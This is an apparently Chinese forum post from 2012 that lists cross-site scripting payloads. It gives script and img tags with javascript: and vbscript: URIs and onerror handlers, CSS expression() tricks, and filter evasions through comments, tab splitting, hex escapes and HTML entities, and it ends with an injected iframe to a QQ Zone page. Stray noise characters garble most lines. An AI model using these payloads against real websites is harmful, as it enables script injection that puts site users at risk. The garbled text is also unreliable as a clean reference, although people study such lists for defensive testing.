<script>alert("跨站")</script> (最常用)
6 C( ~. `# q! O$ L<img scr=javascript:alert("跨站")></img>( }4 H) T" Z; S7 O- D; y
<img scr="javascript: alert(/跨站/)></img>8 e& s; p0 }3 z; L0 z! q
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)2 ~ C$ ?& \3 f- G
<img scr="#" onerror=alert(/跨站/)></img>
" F) V# A9 o8 `<img scr="#" style="xss:expression(alert(/xss/));"></img>, ]8 X* C: |' q" u
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
8 ]! P4 ]8 M: y1 i6 u( r) K h<img src=vbscript:msgbox ("xss")></img>
& v R1 m9 _8 L' N- s9 V3 `1 w<style> input {left:expression (alert('xss'))}</style>
0 o+ P* Y. T/ c' j# R+ F<div style={left:expression (alert('xss'))}></div>
& K! }1 H: P" U( x" U( L<div style={left:exp/* */ression (alert('xss'))}></div>
8 C4 c! r1 N% G$ y% |/ ~' M<div style={left:\0065\0078ression (alert('xss'))}></div>
7 _# G5 D$ @5 U1 bhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
8 F% n/ S# F" Sunicode <div style="{left:expRessioN (alert('xss'))}">! j. g- Q, m3 O
! v ` z; R! Q) {& C( ?: l
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["( y( n% r* p* ?: h- u
|
发表于 2012-9-13 17:15:04
收藏
支持
反对